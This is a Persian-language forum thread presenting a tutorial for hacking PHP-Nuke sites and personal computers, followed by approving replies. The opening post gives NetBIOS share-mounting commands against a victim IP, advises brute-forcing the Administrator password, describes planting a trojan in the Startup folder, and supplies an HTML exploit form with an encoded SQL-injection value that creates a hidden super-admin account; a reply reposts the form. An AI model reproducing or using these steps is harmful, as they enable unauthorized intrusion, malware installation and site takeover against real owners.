تبلیغات :
فیس بوک


    

صفحه 1 از 6 12345 ... آخرآخر
نمايش نتايج 1 به 10 از 55

نام تاپيک: آموزش -- سايت

  1. #1
    داره خودمونی میشه
    تاريخ عضويت
    Sep 2005
    پست ها
    30

    پيش فرض آموزش -- سايت

    سلام دوستان
    اميدوارم از اين آموزش سو استفاده نكنيد
    خیلی ها دوست دارن سایت -- کنن ولی به علتهای مختلف یا نمیتونن وقت بزارن روش یا سایت امنیتش بالاست یا فرد دانش -- کردن رو نداره و... حالا در این درس به آموزش چندین روش برای آموزش -- متداول ترین فروم که PHP-Nuke است بپردازیم.
    اول باید خصوصیات سایت را بررسی کنید و اولین خوصوصیات ضروری پی اچ پی نوک بودن آن هست! به روش های مختلف -- کردنه یوزر ادمین یا ساختن ادمین مخفی را یاد بگیرید.
    در هر سایت نوک یک فروم قرار دارد و همینوطور که میدانید در فروم یک یا چند نفر به cp (مخفف کنترل پانل) دسترسی دارند. شاید از همین فکر چیزی فهمیده باشید. پس در هر تالار چندین کاربر (user) وجود دارد (بستگی به کیفیت تالار دارد) و مدیر هم در بین این کاربران هست و نا کاربری او فاحش هست و می توانید آن را به راحتی ببینید.با این توضیح شما دو روش را برای هم حدس زدید. درسته ! می گن -- سایت سخته ولی اونقدرا هم سخت نیست حتی با ماجیک هم میشه سایت -- کرد! پس فعلا با ماجیک -- می کنیم تا برسیم به جاهای پیشرفته! حالا بايد به سيستم طرف براي نصب تروجان نفوذ كنيد و نت بايوس بهترين راه هست!
    نفوذ به سيستم از طريق NetBios
    -------------------------------------------
    با یاد گیری این مقاله شما میتونید یک درایو از سیستم قربانی رو به وسیله نت بایوس Share کنید و هر کاری که خواستید توی اون درایو انجام بدید ( فایل بذارید ، بردارید ، پاک کنید و ... ) البته من این مقاله رو به صورت تصویری هم تو سایت گذاشتم ، می تونید دانلود کنید.
    خب بریم سره موضوع اصلی:
    اول باید IP سیستم مورد نظر رو پیدا کنید ( تو سایت قبلا اموزش دادم ) ، بعد از منوی Start قسمت Run برید و تایپ کنید CMD. بعد از اینکه وارد CMD شدید این دستور رو بنویسید:
    Net use x: \\IP\DriveName$
    به جای X میتونید هر حرفی رو بنویسید به غیر از حروفی که اسم درایو های خودتون هست.مثلا اگه درایو G داشته باشید ، از حرف G نمیتونید استفاده کنید. به جای IP هم ای پی مورد نظر رو که می خواهید بهش نفوذ کنید رو بنویسید. به جای DriveName هم اسم درایو رو بنویسید. اگه مثلا میخواهید درایو C رو Share کنید ، حرف c رو بنویسید.یک نمونه از دستور رو ببینید:
    Net use x: \\80.191.191.39\c$
    اگه کمی شانس داشته باشید بدون در خواست User Name و Password درایو Share میشه و این پیغام رو مینویسه: The command completed successfully اما اگه از شما در خواست یوزر نیم و پسورد کرد به جای یوزر نیم کلمه Administrator رو وارد کنید که برای ویندوز XP و 2000 تعریف شده است ( البته معمولا تو یه خط یوزر نیم رو میده ).پسورد هم میتونید با یه برنامه مثل بروتوس( Brutus ) پیدا کنید.
    اگه شما درایوی رو Share کرده باشید که ویندوز قربانی هم تو همون درایو نصب شده باشه ، می تونید سرور یک تروجان رو تو پوشه Startup تو قسمت Start Menu کپی کنید و منتظر باشد قربانی ریستارت کنه تا فایل سرور اجرا شه و شما به راحتی با تروجان به سیستم وارد بشید. ( یادتون باشه که سرور رو فقط کپی کنید چون اگه اجرا کنید در واقع تو سیستم خودتون اجرا کردید ) (نويسنده : فرشاد عزيز)
    حالا که یک تروجان در ستارت آپ طرف کپی شد و پسورد او را دریافت کردید.....
    هر کاربر در هنگام ثبت نام در هر تالاری در سایت های نوک باید به اجبار ایمیلی برای خود انتخاب کند که پسورد انتخاب شده به آن ایمیل ارسال شود. ایم خودش یک باگ امنیتی هست و لازم نیست که حتما اکسپلویتی جولوی شما باشد! (ولی بعد از این روش با اکسپلویتی برای -- نوک -- آشنا می شوید)خوب به قسمت (رمزعبور را فراموش کردم) یا ( Forget PassWord ) بروید و ایمیل طرف را وارد تا پسورد فرستاده شود. (این عمل در صورتی اتفاق می شود که نام کاربری بوسیله ی یک ایمیل پشتیبانی شود که در اغلب فروم ها اینجوری هست) حالا که پسورد کاربر مدیر و یا همان شناسه مدیر را گرفتید به منطقه ی کنترل (کنترل پانل) نفوذ کنید و شناسه ی حای را پاک کرده و شناسه ای بسازید و index را عوض کنید. قبل از اینکه ورود به کنترل پانل را به شما یاد دهیم بهتر استروش دیگری برای ساخت ادمین مخفی ( hide admin ) یاد بگیریم! اول باید بفهمیم که نوک چیست؟
    پی اچ پی نوک انواع مختلفی دارد که از سال ۲۰۰۱ به ورژن های مجانی تبدیل شد و برای همین شهرت زیادی پیدا کرد در ابتدا تیم های آمریکایی و پاکستانی ورزن های ۶.۸ . ۶.۹ را مجانی کردند و ایرانی های عزیز نیز برای هموطننانشان از ورژن ۷.۳ تا ۷.۸ (آخرین نسخه) را ترجمه کردند و نوک های فراسی را بوجود آوردند. مثل گروه معروف IranNuke
    این اکسپلویت هم به شما کمک می کند که در کنترل پانل سایت نوک وارد شوید و شناسه ی مدیرتی برای خود بسازید. این اکسپولیت برای نوک ۷.۳ تا ۷.۷ هست و نوک ۷.۸ را فقط اگر روی لکال هاست باشد -- می کند.





    --------------------------------------------------------------------------------


    <form name="mantra" method="POST" action="http://www.sitename.com/admin.php"> USERNAME: <input type="text" name="add_aid"><br> NOME: <input type="text" name="add_name"><br> PASSWORD: <input type="text" name="add_pwd"><br> E-MAIL: <input type="text" name="add_email"><br> <input type="hidden" name="admin" value="eCcgVU5JT04gU0VMRUNUIDEvKjox"><br> <input type="hidden" name="add_radminsuper" value="1"><br> <input type="hidden" name="op" value="AddAuthor"></p> <input type="submit" name="Submit" value="Create Admin"><br> </form>



    --------------------------------------------------------------------------------


    خوب در قسمتی از کد نوشته شده: [ برای مشاهده لینک ، با نام کاربری خود وارد شوید یا ثبت نام کنید ]
    به جای sitename نام سایت را بنویسید و آن را با پسوند html ذخیره سازید.
    به این صورت : exploit.html
    حالا روی آن کلیک کنید و صفحه ای همانند صفحه ی عضویت در آن تالار باز می شود! (حالا بستگی دارد که چه چیز هایی از شما درخواست کند) حالا آن را که پر کردید در زیر آن Create Admin را کلیک کنید و مستقیما به [ برای مشاهده لینک ، با نام کاربری خود وارد شوید یا ثبت نام کنید ] میرید و اونجا با یوزری (شناسه ایی) که ساختید وارد شوید! حالا شما هم سایت پی اچ پی نوک -- کردید!

    موفق باشید

  2. 3 کاربر از prince_love800 بخاطر این مطلب مفید تشکر کرده اند


  3. انفورماتیک پارسه

  4. #2
    کاربر فعال انجمن Tornado2800's Avatar
    تاريخ عضويت
    Jul 2005
    محل سكونت
    بندر عباس
    پست ها
    4,705

    پيش فرض

    سعید تو دیگه چرا بابا ای ول هکر

  5. #3
    پروفشنال hamidma's Avatar
    تاريخ عضويت
    Jun 2005
    پست ها
    650

    پيش فرض

    خیلی خوب بود با تشکر

  6. #4
    آخر فروم باز morteza_k's Avatar
    تاريخ عضويت
    May 2005
    محل سكونت
    مشهد
    پست ها
    1,252

    پيش فرض

    بابا خیلی دمت گرم .

  7. #5
    پروفشنال ehsan_rx1's Avatar
    تاريخ عضويت
    Feb 2005
    محل سكونت
    تهران
    پست ها
    502

    پيش فرض

    دمت گرم خيلي خوب بود؟

  8. #6
    در آغاز فعالیت
    تاريخ عضويت
    Oct 2005
    پست ها
    1

    11

    ایول خوشم اومد باحال بود

  9. #7
    کاربر حرفه ای mehdi87's Avatar
    تاريخ عضويت
    May 2005
    محل سكونت
    87
    پست ها
    840

    پيش فرض


    <form name="mantra" method="POST" action="http://www.sitename.com/admin.php"> USERNAME: <input type="text" name="add_aid"><br> NOME: <input type="text" name="add_name"><br> PASSWORD: <input type="text" name="add_pwd"><br> E-MAIL: <input type="text" name="add_email"><br> <input type="hidden" name="admin" value="eCcgVU5JT04gU0VMRUNUIDEvKjox"><br> <input type="hidden" name="add_radminsuper" value="1"><br> <input type="hidden" name="op" value="AddAuthor"></p> <input type="submit" name="Submit" value="Create Admin"><br> </form
    prince_love800 جان ظاهرا مشكل داره ؟

  10. #8
    پروفشنال double_n's Avatar
    تاريخ عضويت
    Apr 2005
    محل سكونت
    the Shire
    پست ها
    906

    6

    ايول - بد نبود - براي مبتدي ها بد نيست

    يكم مشكل داره

  11. #9
    پروفشنال hatef_4541's Avatar
    تاريخ عضويت
    Jul 2005
    محل سكونت
    ايران/رشت
    پست ها
    681

    پيش فرض

    آموزش هك پورتال بود ! خيلي قديمي هست .

  12. #10
    داره خودمونی میشه
    تاريخ عضويت
    Nov 2005
    پست ها
    23

    پيش فرض عبور از ----- سايت

    با سلام ..

    معرفي سايت هاي ----- شكن و پورت و اي پي باز براي انجمن مشكل ساز ميشه ..

    ممنون از توجهي كه ميكنيد .


    ¤¤¤ mpsjavad ¤¤¤

صفحه 1 از 6 12345 ... آخرآخر

Thread Information

Users Browsing this Thread

هم اکنون 1 کاربر در حال مشاهده این تاپیک میباشد. (0 کاربر عضو شده و 1 مهمان)

به اشتراک بگذارید

به اشتراک بگذارید